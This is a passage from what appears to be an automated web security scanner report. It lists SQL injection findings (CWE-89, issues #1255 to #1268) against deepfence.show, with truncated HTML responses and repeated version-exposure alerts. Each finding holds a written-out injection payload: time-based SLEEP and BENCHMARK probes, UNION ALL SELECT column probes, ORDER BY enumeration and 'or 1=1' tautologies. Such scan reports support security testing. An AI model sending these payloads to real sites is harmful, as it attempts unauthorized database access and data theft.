\nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1255\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# pg_SLEEP(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1256Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1257\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# %2c(select%20*%20from%20(select(sleep(10)))a)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1258\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ' OR '' = '\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1259\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1260\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1261\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1262\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1263\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1264Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1265\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1266\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# or 1=1/*\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1267\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName ValueDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1268\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 17#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- 